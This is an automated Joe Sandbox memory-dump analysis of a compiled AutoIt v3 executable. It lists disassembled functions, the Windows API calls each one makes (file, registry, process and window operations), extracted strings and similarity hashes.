Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: f535c9d98bfd61b5551da32fb7f8f9d60c30b7a640bb2a1fcbb034a6c5dd3ef1
Instruction ID: 9a8c8df65b3278b5a1b9ea008865e49a0adcd9916d46d4883147a0064ed7ea12
Opcode Fuzzy Hash: f535c9d98bfd61b5551da32fb7f8f9d60c30b7a640bb2a1fcbb034a6c5dd3ef1
Instruction Fuzzy Hash: 5EA18231A0AFD3CFCB22CB68BC641997F567B26700B147C9AE485B7361D3B94548CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00593312 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,005932EF,?), ref: 00593342
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,005932EF,?), ref: 00593355
GetFullPathNameW.KERNEL32(00007FFF,?,?,00662418,00662400,?,?,?,?,?,?,005932EF,?), ref: 005933C1

Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA

Part of subcall function 005941E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005933E9,00662418,?,?,?,?,?,?,?,005932EF,?), ref: 00594227

SetCurrentDirectoryW.KERNELBASE(?,00000001,00662418,?,?,?,?,?,?,?,005932EF,?), ref: 00593442
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 005D3C8A
SetCurrentDirectoryW.KERNEL32(?,00662418,?,?,?,?,?,?,?,005932EF,?), ref: 005D3CCB
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006531F4,00662418,?,?,?,?,?,?,?,005932EF), ref: 005D3D54
ShellExecuteW.SHELL32(00000000,?,?), ref: 005D3D5B

Part of subcall function 0059345A: GetSysColorBrush.USER32(0000000F), ref: 00593465
Part of subcall function 0059345A: LoadCursorW.USER32(00000000,00007F00), ref: 00593474
Part of subcall function 0059345A: LoadIconW.USER32(00000063), ref: 0059348A
Part of subcall function 0059345A: LoadIconW.USER32(000000A4), ref: 0059349C
Part of subcall function 0059345A: LoadIconW.USER32(000000A2), ref: 005934AE
Part of subcall function 0059345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005934C6
Part of subcall function 0059345A: RegisterClassExW.USER32(?), ref: 00593517

Part of subcall function 0059353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00593568
Part of subcall function 0059353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00593589
Part of subcall function 0059353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,005932EF,?), ref: 0059359D
Part of subcall function 0059353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,005932EF,?), ref: 005935A6

Part of subcall function 005938F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005939C3

Strings

It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 005D3C84
AutoIt, xrefs: 005D3C7F
runas, xrefs: 005D3D4F
0$f, xrefs: 0059341C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: 0$f$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2534309212
Opcode ID: 9f63a33529fb235cda344aac3ab280fd18f583100cc8e898626f82ce5c0cb274
Instruction ID: b784be508925d490d3f1eccc7b0c61aa34f78dc41e86822abbe5f2900bc6c933
Opcode Fuzzy Hash: 9f63a33529fb235cda344aac3ab280fd18f583100cc8e898626f82ce5c0cb274
Instruction Fuzzy Hash: 9151E430108743EEDF11EF64EC5A96E7FEABFD1744F441429F481522A2DF648A4ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00609F9F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,75568FB0,?,00000000), ref: 00609FC0
GetFileAttributesW.KERNELBASE(?), ref: 00609FFE
SetFileAttributesW.KERNELBASE(?,?), ref: 0060A018
FindNextFileW.KERNELBASE(00000000,?), ref: 0060A030
FindClose.KERNEL32(00000000), ref: 0060A03B
FindFirstFileW.KERNEL32(*.*,?), ref: 0060A057
SetCurrentDirectoryW.KERNEL32(?), ref: 0060A0A7
SetCurrentDirectoryW.KERNEL32(00657B94), ref: 0060A0C5
FindNextFileW.KERNEL32(00000000,00000010), ref: 0060A0CF
FindClose.KERNEL32(00000000), ref: 0060A0DC
FindClose.KERNEL32(00000000), ref: 0060A0EC

Strings

*.*, xrefs: 0060A052

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 84aae54e9fdd7f6241fdb8c93d7dff7467a06e6b4f0e22a060a011fa8583b3e6
Instruction ID: c5b31b2ebf92683fcbbbe2dfe1013846322a5ecd591ea90ae94c7909081d2c32
Opcode Fuzzy Hash: 84aae54e9fdd7f6241fdb8c93d7dff7467a06e6b4f0e22a060a011fa8583b3e6
Instruction Fuzzy Hash: 1731E33264171DABDB28DFF4EC49ADF77AEAF053A5F104055E902E21D0EB30DE458A21

Uniqueness

Uniqueness Score: -1.00%

Function 005FD836 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E

Part of subcall function 005FE9C5: GetFileAttributesW.KERNELBASE(?,005FD755), ref: 005FE9C6

FindFirstFileW.KERNELBASE(?,?), ref: 005FD8E2
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 005FD99D
MoveFileW.KERNEL32(?,?), ref: 005FD9B0
DeleteFileW.KERNEL32(?,?,?,?), ref: 005FD9CD
FindNextFileW.KERNELBASE(00000000,00000010), ref: 005FD9F7

Part of subcall function 005FDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,005FD9DC,?,?), ref: 005FDA72

FindClose.KERNEL32(00000000,?,?,?), ref: 005FDA13
FindClose.KERNEL32(00000000), ref: 005FDA24

Strings

\*.*, xrefs: 005FD88D, 005FD896, 005FD8AB

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 9ab89dfdaa7605d700a14c0d8a2876c3c4d438448d8ee9f7fd012643383c0033
Instruction ID: 08f7b241fa90914b5db871eeae3a4e1c88afa5c96840d1dcd1748f091c676aeb
Opcode Fuzzy Hash: 9ab89dfdaa7605d700a14c0d8a2876c3c4d438448d8ee9f7fd012643383c0033
Instruction Fuzzy Hash: 35615B3180124EAADF01EBE0DA96AFDBFB6BF54300F644065E541B71A2EB755F09CB60

Uniqueness

Uniqueness Score: -1.00%

Function 005FDB69 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E

Part of subcall function 005FE9C5: GetFileAttributesW.KERNELBASE(?,005FD755), ref: 005FE9C6

FindFirstFileW.KERNELBASE(?,?), ref: 005FDBE0
DeleteFileW.KERNELBASE(?,?,?,?), ref: 005FDC30
FindNextFileW.KERNEL32(00000000,00000010), ref: 005FDC41
FindClose.KERNEL32(00000000), ref: 005FDC58
FindClose.KERNEL32(00000000), ref: 005FDC61

Strings

\*.*, xrefs: 005FDBB2

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 1f18b1518d12207d604004fddd296b55a877551352c8f557f966ff8bf165175a
Instruction ID: 9dd195ff09f20c057de52adbcb02aead0fa0f1a8557d2b8f9ed268f6db73db14
Opcode Fuzzy Hash: 1f18b1518d12207d604004fddd296b55a877551352c8f557f966ff8bf165175a
Instruction Fuzzy Hash: 0331AF3100838A9BDB00EF64D9959AFBBF9BE91300F444D1DF5D5831A1EB64DE09CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 005FDC9C Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 005FDCC1
Process32FirstW.KERNEL32(00000000,?), ref: 005FDCCF
Process32NextW.KERNEL32(00000000,?), ref: 005FDCEF
FindCloseChangeNotification.KERNELBASE(00000000), ref: 005FDD9C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: afb86d97ec19734370ec097c2617666687f115c368babf7030795216065ca040
Instruction ID: b2ae9e1ce7fb1f4f8c843c3e09efc721b9f7da6ff628291ccc79d7f9ab8f1f00
Opcode Fuzzy Hash: afb86d97ec19734370ec097c2617666687f115c368babf7030795216065ca040
Instruction Fuzzy Hash: C4316C711083059FE711EF60D889BAFBFF9BF99350F04082DF581861A1EB719945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 005FE387 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,005D4686), ref: 005FE397
GetFileAttributesW.KERNELBASE(?), ref: 005FE3A6
FindFirstFileW.KERNELBASE(?,?), ref: 005FE3B7
FindClose.KERNELBASE(00000000), ref: 005FE3C3

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 9f304abbbc7c6e7eff33bbd922ac2d1b23e8473d73dc560c63d084fbe6579701
Instruction ID: 1095670156b02d9b602717cde35940dd5bb13999e60590ab1056fa9919bcf99f
Opcode Fuzzy Hash: 9f304abbbc7c6e7eff33bbd922ac2d1b23e8473d73dc560c63d084fbe6579701
Instruction Fuzzy Hash: 30F0A730411918978331673C9C0E47A7BADAE41335B105B11F635C21F0D774A9564595

Uniqueness

Uniqueness Score: -1.00%

Function 005B5078 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,005B504E,?,006598D8,0000000C,005B51A5,?,00000002,00000000), ref: 005B5099
TerminateProcess.KERNEL32(00000000,?,005B504E,?,006598D8,0000000C,005B51A5,?,00000002,00000000), ref: 005B50A0
ExitProcess.KERNEL32 ref: 005B50B2

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0ded76f057b7d01e4b586752f508b2cf40dfdc0ca6d038d88ba05b0ac7e52799
Instruction ID: f217779858b3a41512763f974376d96427e5ec8619f2c865e68110401070fb7d
Opcode Fuzzy Hash: 0ded76f057b7d01e4b586752f508b2cf40dfdc0ca6d038d88ba05b0ac7e52799
Instruction Fuzzy Hash: C8E09231401A48AFCB25BF54DD0DF983F6ABB81391F005018F8098A522EB35EA52CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0061CD16 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061CE1C
RegCreateKeyExW.KERNELBASE(?,?,00000000,0062DCD0,00000000,?,00000000,?,?), ref: 0061CEA3
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0061CF03
_wcslen.LIBCMT ref: 0061CF53
_wcslen.LIBCMT ref: 0061CFCE
RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 0061D011
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0061D120
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0061D1AC
RegCloseKey.KERNELBASE(?), ref: 0061D1E0
RegCloseKey.ADVAPI32(00000000), ref: 0061D1ED
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0061D2BF

Strings

REG_SZ, xrefs: 0061CFA3
REG_DWORD, xrefs: 0061D163
REG_EXPAND_SZ, xrefs: 0061CF2C
REG_MULTI_SZ, xrefs: 0061D054
REG_QWORD, xrefs: 0061D222
REG_BINARY, xrefs: 0061D272

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 1c44a26ee1bd012a23eadb2a5bcf72cab268c0526af1947ae867c7940fe2ee5f
Instruction ID: 7682e4f69a40a2624c0e8fb3c70ec1bcc188ba16ccc108ffdf575f2566021d2f
Opcode Fuzzy Hash: 1c44a26ee1bd012a23eadb2a5bcf72cab268c0526af1947ae867c7940fe2ee5f
Instruction Fuzzy Hash: DF125B352046019FDB14DF14C895A6ABBE6FF89714F18845CF99A9B3A2CB31FD42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00593E15 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Cannot parse #include, xrefs: 005D46DD
", xrefs: 005D45B7
#comments-end, xrefs: 00593F76
#comments-start, xrefs: 00593EFC, 00593F4E
#ce, xrefs: 00593F8A
', xrefs: 005D45CD
#include-once, xrefs: 00593ECC
#include, xrefs: 00593EE4
Bad directive syntax error, xrefs: 005D45FE
Unterminated group of comments, xrefs: 005D46F0
#pragma compile, xrefs: 00593E70
#cs, xrefs: 00593F10, 00593F62
#notrayicon, xrefs: 00593E84
#requireadmin, xrefs: 00593E9C
#OnAutoItStartRegister, xrefs: 00593EB4

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 55172d4dd7d32ced6daab5237d32698fc6433a7d8c5d84a52ad96eabbd2cc5f2
Instruction ID: 8c2c769692c598382e83a1a802123e980c0a5f1ffe88eff784b047f129b2ee25
Opcode Fuzzy Hash: 55172d4dd7d32ced6daab5237d32698fc6433a7d8c5d84a52ad96eabbd2cc5f2
Instruction Fuzzy Hash: C081F671A40217FBDF21AF68DC4AFAE3F69BF55700F044012F905AA182EB70EA41DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00593696 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00593690,?,?), ref: 005936FE
KillTimer.USER32(?,00000001,?,?,?,?,?,00593690,?,?), ref: 0059372A
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0059374D
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00593690,?,?), ref: 00593758
CreatePopupMenu.USER32 ref: 0059376C
PostQuitMessage.USER32(00000000), ref: 0059378D

Strings

TaskbarCreated, xrefs: 00593753
0$f, xrefs: 005D3D83
0$f, xrefs: 005D3DD1

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: 0$f$0$f$TaskbarCreated
API String ID: 129472671-1944884100
Opcode ID: 5eab08a1512ed1cb795e2b0f0e8627aafb7a8289738b0ba786dd87ed30b06773
Instruction ID: 9b8c893e3f7660ebacec7c062d5b7994ba6d0d7490dfc7c4f5d87d84285752db
Opcode Fuzzy Hash: 5eab08a1512ed1cb795e2b0f0e8627aafb7a8289738b0ba786dd87ed30b06773
Instruction Fuzzy Hash: 8C4112B1104546FBDF242BA8DC6EB793F5BFB40390F041626F5129A3A1DBA99F018762

Uniqueness

Uniqueness Score: -1.00%

Function 005935AB Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 005935DE
RegisterClassExW.USER32(00000030), ref: 00593608
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00593619
InitCommonControlsEx.COMCTL32(?), ref: 00593636
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00593646
LoadIconW.USER32(000000A9), ref: 0059365C
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0059366B

Strings

TaskbarCreated, xrefs: 0059360E
AutoIt v3 GUI, xrefs: 005935FA
+, xrefs: 005935C7
0, xrefs: 005935C0

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 3ffc27c6f86c3a873b390959cf3246003f0228e01312b94fc2610032b886dd28
Instruction ID: 8efae99349879cfdd3f7cbbbdba2163cbe05546907b8b72ee4f7b1b4854eb9d5
Opcode Fuzzy Hash: 3ffc27c6f86c3a873b390959cf3246003f0228e01312b94fc2610032b886dd28
Instruction Fuzzy Hash: 7A21E0B1D01719AFDB10DFA5E889ADDBBB6FB08700F10621AF611A62A0D7B54541CF90

Uniqueness

Uniqueness Score: -1.00%

Function 005D09FB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005D073A: CreateFileW.KERNELBASE(00000000,00000000,?,005D0AA4,?,?,00000000,?,005D0AA4,00000000,0000000C), ref: 005D0757

GetLastError.KERNEL32 ref: 005D0B0F
__dosmaperr.LIBCMT ref: 005D0B16
GetFileType.KERNELBASE(00000000), ref: 005D0B22
GetLastError.KERNEL32 ref: 005D0B2C
__dosmaperr.LIBCMT ref: 005D0B35
CloseHandle.KERNEL32(00000000), ref: 005D0B55
CloseHandle.KERNEL32(?), ref: 005D0C9F
GetLastError.KERNEL32 ref: 005D0CD1
__dosmaperr.LIBCMT ref: 005D0CD8

Strings

H, xrefs: 005D0C5D

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 5e9140804d4b81f7e7aeed574e0edd9360e816b317f162cfbd1537185bebc7e8
Instruction ID: 86b0d3ec81d43216389f96276cf6b30c97ce65e8c05e97a52e5594a81d81454f
Opcode Fuzzy Hash: 5e9140804d4b81f7e7aeed574e0edd9360e816b317f162cfbd1537185bebc7e8
Instruction Fuzzy Hash: 66A11332A041459FDF29AFACD856BAE7FA1BB46324F14115BF8119F3E1C7309912CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0059522E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0059551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00595539

Part of subcall function 005951BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005951E1

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0059534B
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005D4BD7
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005D4C18
